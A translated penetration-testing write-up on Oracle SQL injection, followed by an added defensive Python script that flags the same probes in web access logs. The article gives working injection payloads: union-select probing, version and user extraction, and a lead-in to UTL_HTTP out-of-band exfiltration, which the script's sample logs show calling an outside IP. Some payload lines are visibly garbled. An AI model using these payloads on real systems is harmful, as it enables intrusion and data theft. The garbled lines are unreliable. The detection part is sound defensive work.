Author: Black Eagle, Shandong Information Security Group
You have probably read the author's earlier article "Oracle injection in an actual penetration of China Unicom". Whether or not it surprised you, I do not know whether readers have ever run into the situation the author hit there: when the union select used to dump all the table names cannot display them all, how do we continue? Here we use UTL_HTTP rebound (out-of-band) injection.
● Determine the injection point
The injection point was found by manual testing. From the returned error "java.sql.SQLException: ORA-01756" the author's preliminary judgement is that the backend is Oracle.
● Determine the database type
Appending "/*" to the URL returns an error page, which rules out MySQL.
Appending "--" to the URL returns the normal page, so the database may be MSSQL or Oracle.
To confirm Oracle, the author appends "and (select count(*) from user_tables)>0 --" to the URL; the normal page is returned, so it is Oracle.
Note: user_tables exists only in Oracle.
● Guess the number of fields
The author submits "order by 7 --" and the correct page is returned.
Submitting "order by 8 --" returns the error page, which confirms that the current query has 7 fields.
● Test the field types
The author submits "union select null, null, … (seven nulls) from dual" and the normal page is returned, confirming that there are indeed seven fields.
The next step is to determine the field types, because only a field position of character (string) type can carry the content we want to query.
I submitted the following tests in sequence (URL-encoded, with %20 for spaces; the position under test is written Null):
union select Null, Null from dual
union select null, Null, Null from dual
union select null, null, Null, Null from dual
......
Submitting these in turn until all seven fields had been tested, I found that positions 1, 3, 4, 6 and 7 display normally.
Submit: and 1=2 union select %7%,20 from dual
I tested the Oracle database version by submitting:
and 1=2 union select (select banner from sys.v_$version where rownum=1),2,3,4,5,6,7 from dual
which displayed Oracle 10g.
I also determined that the currently connected user is TOTO, by submitting:
and 1=2 union select (select SYS_CONTEXT('USERENV','CURRENT_USER') from dual),6,7 from dual
I ran into a problem when dumping the table names. Submitting:
and 1=2 union select TABLE_NAME, … from USER_TABLES
should display all of the user's tables, but because there are many tables and the page has limited display space, only some of them are shown. This is where UTL_HTTP rebound injection comes in.
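The probe sequence above (database fingerprinting with user_tables and "from dual", column counting with "order by N --", the union-select-null walk, the version query against sys.v_$version, and finally the UTL_HTTP out-of-band channel) leaves a very recognisable trail in a web server's access log. The script below is an added example written from the defender's side; it is not part of the original article and not the author's tooling. It parses constructed Apache-style log lines (the sample lines, the IPs and the hostnames in them are made up for this example), URL-decodes each query string (twice, because double encoding is a common evasion), and counts per source address which of the article's probe stages it has seen, so that a single address running through several stages in a row can be raised as SQL injection reconnaissance rather than a one-off false positive.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus, urlsplit

# Constructed sample access-log lines (not taken from the article). The query
# strings reproduce the shapes of the probes the article walks through; the
# addresses and paths are placeholders.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0800] "GET /news.jsp?id=12 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0800] "GET /news.jsp?id=12%20and%20(select%20count(*)%20from%20user_tables)%3E0%20-- HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:03 +0800] "GET /news.jsp?id=12%20order%20by%208%20-- HTTP/1.1" 500 812
10.0.0.9 - - [01/Jan/2024:10:00:04 +0800] "GET /news.jsp?id=12%20and%201=2%20union%20select%20null,null,null,null,null,null,null%20from%20dual HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:05 +0800] "GET /news.jsp?id=12%20and%201=2%20union%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1),2,3,4,5,6,7%20from%20dual HTTP/1.1" 200 5301
10.0.0.9 - - [01/Jan/2024:10:00:06 +0800] "GET /news.jsp?id=12%20and%20utl_http.request('http://203.0.113.7/')%20is%20not%20null HTTP/1.1" 500 812
10.0.0.7 - - [01/Jan/2024:10:00:07 +0800] "GET /news.jsp?id=13&sort=order_by_date HTTP/1.1" 200 4990
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# One (name, pattern) pair per stage of the article's probe sequence. Patterns
# run against the decoded, lower-cased query string.
SIGNATURES = [
    ("oracle_fingerprint", re.compile(
        r"\b(user_tables|all_tables|sys\.v_\$version|from\s+dual|sys_context)\b")),
    ("column_count_probe", re.compile(r"\border\s+by\s+\d+\s*--")),
    ("union_null_probe", re.compile(r"\bunion\s+select\b.*\bnull\b")),
    ("oob_utl_http", re.compile(r"\butl_http\b")),
]


def decode_query(target):
    """Return the decoded query string of a request target.

    Decoding is repeated (bounded to two rounds) so that a double-encoded
    payload such as %2520 is normalised before the signatures run.
    """
    query = urlsplit(target).query
    for _ in range(2):
        decoded = unquote_plus(query)
        if decoded == query:
            break
        query = decoded
    return query


def classify(line):
    """Return (ip, status, [matching signature names]) for one log line,
    or None when the line does not parse as a log record."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = decode_query(m.group("target")).lower()
    hits = [name for name, pattern in SIGNATURES if pattern.search(query)]
    return m.group("ip"), int(m.group("status")), hits


def scan(log_text):
    """Aggregate signature hits per source IP.

    Returns {ip: {"hits": Counter(signature -> count), "errors": int}} where
    "errors" counts 5xx responses to flagged requests (the error pages the
    article relies on to tell a wrong guess from a right one).
    """
    report = {}
    for line in log_text.splitlines():
        result = classify(line)
        if result is None:
            continue
        ip, status, hits = result
        if not hits:
            continue
        entry = report.setdefault(ip, {"hits": Counter(), "errors": 0})
        entry["hits"].update(hits)
        if status >= 500:
            entry["errors"] += 1
    return report


def suspicious_sources(report, min_distinct=2):
    """IPs that tripped at least min_distinct different signatures. One hit can
    be a false positive; stepping through several stages is reconnaissance."""
    return sorted(ip for ip, entry in report.items()
                  if len(entry["hits"]) >= min_distinct)


if __name__ == "__main__":
    for ip, entry in scan(SAMPLE_LOG).items():
        print(ip, dict(entry["hits"]), "5xx responses:", entry["errors"])
    print("suspicious:", suspicious_sources(scan(SAMPLE_LOG)))
```

On the sample data only 10.0.0.9 is reported: it trips the fingerprint, column-count, union-null and UTL_HTTP stages and drew two error pages, while the benign "sort=order_by_date" request from 10.0.0.7 matches nothing because the column-count pattern requires whitespace around "order by" and a trailing comment marker. The oob_utl_http signature is the one worth alerting on immediately: the article's whole point is that once page space runs out, the attacker stops reading results from the page and has the database ship them out over HTTP, so the usual mitigations are to revoke EXECUTE on UTL_HTTP from PUBLIC and to block outbound HTTP from the database host, on top of fixing the injection itself with bound parameters.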